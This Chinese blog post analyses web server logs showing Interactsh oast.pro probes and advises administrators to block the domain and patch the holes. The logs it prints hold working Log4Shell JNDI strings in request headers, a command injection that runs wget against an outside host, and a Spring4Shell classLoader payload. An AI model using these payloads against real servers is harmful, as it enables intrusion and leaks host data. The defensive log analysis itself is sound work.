技术日志

记录分享邓杰律师从事网络技术工作点点滴滴。

位置:首页>资讯动态>技术日志

与Interactsh检测漏洞工具相关的oast.pro日志特征及安全防范

点击复制标题网址

——温馨提示——

已复制到剪贴板,可粘贴到下一处。


时间:2023-10-02   访问量:1365

编者按:一、经分析web服务器,出现以下日志:114.236.1.125 - [-] [2023-06-14T07:07:08+08:00] "[-] [www.a.com] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj01uiiwd7tn7rby.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrom

        一、经分析web服务器,出现以下日志:

114.236.1.125 - [-] [2023-06-14T07:07:08+08:00] "[-] [www.a.com] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj01uiiwd7tn7rby.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36] [- 6824 0.000 -]

49.69.183.138 - [${jndi:ldap://${:-957}${:-583}.${hostName}.xforwardedfor.ci42e559mpo23m5krkj01xu1bqhx59jwe.oast.pro}] [2023-06-14T07:07:49+08:00] "[${jndi:ldap://${:-957}${:-583}.${hostName}.referer.ci42e559mpo23m5krkj0h87hxnbjbjwjs.oast.pro}] [www.a.com] GET / HTTP/1.1" 200 [${jndi:ldap://${:-957}${:-583}.${hostName}.useragent.ci42e559mpo23m5krkj06h5ej6axass6w.oast.pro}] [- 38415 31.299 -]

117.93.58.69 - [-] [2023-06-14T08:08:49+08:00] "[-] [www.b.com] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj08c3uxo7ibbtzp.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36] [- 6825 0.000 -]

180.126.138.228 - [${jndi:ldap://${:-957}${:-583}.${hostName}.xforwardedfor.ci42e559mpo23m5krkj0nm4tcfaeejrw1.oast.pro}] [2023-06-14T08:08:50+08:00] "[${jndi:ldap://${:-957}${:-583}.${hostName}.referer.ci42e559mpo23m5krkj08sbmois6zwa1s.oast.pro}] [www.b.com] GET / HTTP/1.1" 200 [${jndi:ldap://${:-957}${:-583}.${hostName}.useragent.ci42e559mpo23m5krkj0iczywkssyo3bf.oast.pro}] [- 28206 0.000 -]

117.93.223.101 - [-] [2023-06-14T08:23:16+08:00] "[-] [www.c.net] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj0infwjqa91tibg.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36] [- 6332 0.000 -]

180.117.101.90 - [${jndi:ldap://${:-957}${:-583}.${hostName}.xforwardedfor.ci42e559mpo23m5krkj0u35bg4e1qq5ob.oast.pro}] [2023-06-14T08:24:05+08:00] "[${jndi:ldap://${:-957}${:-583}.${hostName}.referer.ci42e559mpo23m5krkj0wqmnd4ot49ijp.oast.pro}] [www.c.net] GET / HTTP/1.1" 200 [${jndi:ldap://${:-957}${:-583}.${hostName}.useragent.ci42e559mpo23m5krkj0xxrwetsqdg7nu.oast.pro}] [- 27454 28.667 -]

117.93.49.191 - [-] [2023-06-14T09:18:30+08:00] "[-] [www.a.com] GET /search.php?search=%22;wget+http%3A%2F%2Fci42e559mpo23m5krkj0xucn4zhzmfw9q.oast.pro%27;%22 HTTP/1.1" 404 [Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36] [- 801 0.000 -]

117.93.58.152 - [-] [2023-06-14T09:42:28+08:00] "[-] [www.b.com] GET /search.php?search=%22;wget+http%3A%2F%2Fci42e559mpo23m5krkj0ndkhqp1adwzku.oast.pro%27;%22 HTTP/1.1" 404 [Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36] [- 737 0.000 -]

221.231.28.196 - [-] [2023-06-14T13:14:43+08:00] "[-] [www.a.com] GET /?class.module.classLoader.resources.context.configFile=http://ci42e559mpo23m5krkj05jy69bdwrtgc8.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36] [- 6824 0.000 -]

        二、经查询,http://www.oast.pro/官网,Interactsh和.oast.pro相关情况如下:

Interactsh Server

Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions.

If you notice any interactions from *.oast.pro in your logs, it's possible that someone (internal security engineers, pen-testers, bug-bounty hunters) has been testing your application.

You should investigate the sites where these interactions were generated from, and if a vulnerability exists, examine the root cause and take the necessary steps to mitigate the issue.

经谷歌翻译成中文如下:

Interactsh是一个用于检测带外交互的开源工具。它是一种旨在检测导致外部交互的漏洞的工具。

如果您在日志中发现来自*.oast.pro的任何交互,则可能有人(内部安全工程师、笔测试人员、错误赏金猎人)一直在测试您的应用程序。

您应该调查生成这些交互的站点,如果存在漏洞,请检查根本原因并采取必要的步骤来缓解问题。

        三、根据以上情况,应在对.oast.pro及相应ip采取安全措施的同时,堵上任何与此相关的漏洞以提高web服务器的安全性。

        以上是邓杰律师在分析网站服务器访问日志中发现的问题,供各位网站服务器维护工程师在采取屏蔽或者放行等安全措施时参考。

本文标签:

服务器安全

网络渗透

网络攻击

渗透攻击

网络安全

主机安全

黑客

漏洞检测

发表评论:

评论记录:

未查询到任何数据!

上一篇notepad++替换删除相关代码内容常用技巧汇总

下一篇Font Awesome图标字体安装及使用方法

关于律师
————受人之托,忠人之事————
深圳数据合规律师
邓杰律师

专业

专注执业领域事务

尽责

全力办理委托事项

务实

扎实维护合法权益

邓杰系深耕于数据合规领域复合型资深专业律师,其律师执业证号为14403201810022100。邓杰律师现(曾)任WEB前端开发工程师、WEB服务器维护工程师、计算机信息网络安全员、深圳市人民政府听证员、深圳市政府采购评审专家(法律类)、深圳市某区政府系统公职律师,在网络领域和政府系统从业多年,深刻理解网络前沿技术和行政程序运行规则,十分擅长互联网+平台领域数据合规法律实务,可为政府、企业和个人在数据合规领域提供富有针对性的非诉、诉讼、仲裁、执行等法律风险防控解决方案,能有效维护当事人的各类合法权益。

· · · 查看更多 · · ·

二维码

用手机扫码后浏览网站

拜访炜衡律所

  • 律所执业证号:24403200511032007
  • 地址:广东省深圳市南山区科发路19号华润置地大厦D座19楼
  • 邮编:518057
  • 传真:+86-0755-82984599

联系邓杰律师

  • 律师执业证号:14403201810022100
  • 手机:13715198118
  • 座机:+86-0755-82984411
  • 邮箱:szdengjie@qq.com
  • Q Q:578700168

深圳数据合规律师名片

扫码惠存邓杰律师名片

深圳数据合规律师微信

扫码添加邓杰律师微信

CopyRight © 2029 mygreen.cn All Rights Reserved.
建站由法脉网提供,点击购买同款网站
XML格式地图TXT格式地图

关于我们

执业领域

联系我们

电话咨询

扫一扫,存名片

深圳数据合规律师名片

律师名片

QQ扫一扫

深圳数据合规律师qq

QQ咨询

电话咨询

邓杰律师电话:13715198118

请输入您的联系电话,座机请加区号

电话咨询

微信扫一扫

深圳数据合规律师微信

微信联系